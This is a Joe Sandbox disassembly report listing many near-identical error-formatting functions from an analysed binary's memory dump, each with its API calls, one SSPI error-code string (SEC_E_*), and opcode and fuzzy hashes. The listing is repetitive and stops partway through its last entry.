Function 00007FF7F1DAEC2D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_CANNOT_INSTALL, xrefs: 00007FF7F1DAEC2D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CANNOT_INSTALL
API String ID: 1435330505-2628789574
Opcode ID: fd10da4310bec428fa8df86127f791fb119ff3b3588069eb0d240343dd530814
Instruction ID: 0404fafb3374cc1c77b7fb03ae7ff77b3caf9967fed1c7d0e9e04cb7001e32bf
Opcode Fuzzy Hash: fd10da4310bec428fa8df86127f791fb119ff3b3588069eb0d240343dd530814
Instruction Fuzzy Hash: 12118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEBFD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_ALGORITHM_MISMATCH, xrefs: 00007FF7F1DAEBFD
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ALGORITHM_MISMATCH
API String ID: 1435330505-618797061
Opcode ID: c2b8f0d1e5ccba64c32f0a624bcc3729056efbf001cde90110e6ac243a037f36
Instruction ID: a72dd0424fe633ca7d12ec1fa8b38f21f50bf957a8b655b419db9fe6c64c4a1d
Opcode Fuzzy Hash: c2b8f0d1e5ccba64c32f0a624bcc3729056efbf001cde90110e6ac243a037f36
Instruction Fuzzy Hash: 04118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC15 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_BAD_PKGID, xrefs: 00007FF7F1DAEC15
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_PKGID
API String ID: 1435330505-1052566392
Opcode ID: bc30fd3f4a3bc19e710b9030b16e57e997d887bcacf9363450b4ec3e4d17485e
Instruction ID: 38c57b60170359261f68ab0a9c6f7822fb927ce621b8cedd7e280c3cdf4581f9
Opcode Fuzzy Hash: bc30fd3f4a3bc19e710b9030b16e57e997d887bcacf9363450b4ec3e4d17485e
Instruction Fuzzy Hash: 2B118F22618A4285E7A9FF10A0442FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEC09 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_BAD_BINDINGS, xrefs: 00007FF7F1DAEC09
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_BAD_BINDINGS
API String ID: 1435330505-2710416593
Opcode ID: 6804147e1eb312475d8e902baecbab68306308189effb1bc71cef56ee18b6ff5
Instruction ID: 39472aebd04833f89d2410b6b9fe8fb97459cdc1593d209a89a2df26a5aed6ff
Opcode Fuzzy Hash: 6804147e1eb312475d8e902baecbab68306308189effb1bc71cef56ee18b6ff5
Instruction Fuzzy Hash: 7C118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEEFD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_UNSUPPORTED_FUNCTION, xrefs: 00007FF7F1DAEEFD
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNSUPPORTED_FUNCTION
API String ID: 1435330505-1880870521
Opcode ID: 5e952c1448b4ff57e0aa67cac9907b3cb81e88ba3a17a4f344b645d298109aa1
Instruction ID: ae6d93df7596765a9dcb5a3d2e9523e814603adda19b0d29bde2abb1ce771eca
Opcode Fuzzy Hash: 5e952c1448b4ff57e0aa67cac9907b3cb81e88ba3a17a4f344b645d298109aa1
Instruction Fuzzy Hash: 65118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEF15 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_UNTRUSTED_ROOT, xrefs: 00007FF7F1DAEF15

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNTRUSTED_ROOT
API String ID: 1435330505-3666586070
Opcode ID: d2f244dddce7218a3b3ea29f2029f3774eec740347a7c77a28c5f3d9941c6c6a
Instruction ID: 6ed71da8ee114d3f71d6ae5f89f46a818671ba8eb2c34249fe60b261f0d23ac1
Opcode Fuzzy Hash: d2f244dddce7218a3b3ea29f2029f3774eec740347a7c77a28c5f3d9941c6c6a
Instruction Fuzzy Hash: 1B118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEF09 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_UNSUPPORTED_PREAUTH, xrefs: 00007FF7F1DAEF09
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNSUPPORTED_PREAUTH
API String ID: 1435330505-3662181683
Opcode ID: 30df4ccde53fdf39ffad4605a0487858b39623af19d0ad5aa22ec64cc6677a61
Instruction ID: 3d42f4d51149f8191d1a0346908df5b07d7edf4c5df458057906a730a696d169
Opcode Fuzzy Hash: 30df4ccde53fdf39ffad4605a0487858b39623af19d0ad5aa22ec64cc6677a61
Instruction Fuzzy Hash: 70118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEEE5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 00007FF7F1DAEEE5
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNFINISHED_CONTEXT_DELETED
API String ID: 1435330505-784520498
Opcode ID: 7566ec670cce047f974539ac0a6cfbab37ee68ccead97b40aefb4dca074046b5
Instruction ID: 2b32c13f5472ef11929691b6ae44585ce1b5f499f902e3dddd8dfa7c5993d311
Opcode Fuzzy Hash: 7566ec670cce047f974539ac0a6cfbab37ee68ccead97b40aefb4dca074046b5
Instruction Fuzzy Hash: 08116D22618A4285E7A8FF10A0402EDA375FF88781FC14036E9AE027D6DFFCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEED9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_TOO_MANY_PRINCIPALS, xrefs: 00007FF7F1DAEED9
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TOO_MANY_PRINCIPALS
API String ID: 1435330505-1024473768
Opcode ID: 78b8b44a990ee2e6a7abde2b2a115a8dc87a4acfbf5ae807cf55fe804ac1d6dc
Instruction ID: 708259cfb3cb4e1f5f2becb6bdd1d6f86a3bf1a1e0f852d01240835f6dbb6747
Opcode Fuzzy Hash: 78b8b44a990ee2e6a7abde2b2a115a8dc87a4acfbf5ae807cf55fe804ac1d6dc
Instruction Fuzzy Hash: 16116022618A4285E7A8FF10A0402EDA375FF88741FC14036D99E027D6DFBCD845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEEF1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_UNKNOWN_CREDENTIALS, xrefs: 00007FF7F1DAEEF1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_UNKNOWN_CREDENTIALS
API String ID: 1435330505-526997280
Opcode ID: 0c7ccf6754badb94526b334798bb17f90f1bdc6d3c6ae506c1a3afac7c706a2e
Instruction ID: 556cf35b223e81d5653f4104138211cb8c86ceab5a366015341fef5ccee29d64
Opcode Fuzzy Hash: 0c7ccf6754badb94526b334798bb17f90f1bdc6d3c6ae506c1a3afac7c706a2e
Instruction Fuzzy Hash: D8118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCE845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEEC1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_TARGET_UNKNOWN, xrefs: 00007FF7F1DAEEC1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TARGET_UNKNOWN
API String ID: 1435330505-2019469157
Opcode ID: 486e50956a97043c0d6743b7c0686e98874ff563a633ebc836e197468bfc8ccf
Instruction ID: 48bf90b9367d958b861347f23fb206f4c49e4b1099c648d13f8b9f15abc30d10
Opcode Fuzzy Hash: 486e50956a97043c0d6743b7c0686e98874ff563a633ebc836e197468bfc8ccf
Instruction Fuzzy Hash: 1E116D22618A4285E7A8FF10A0402EDA375FF88781FC54036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEECD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

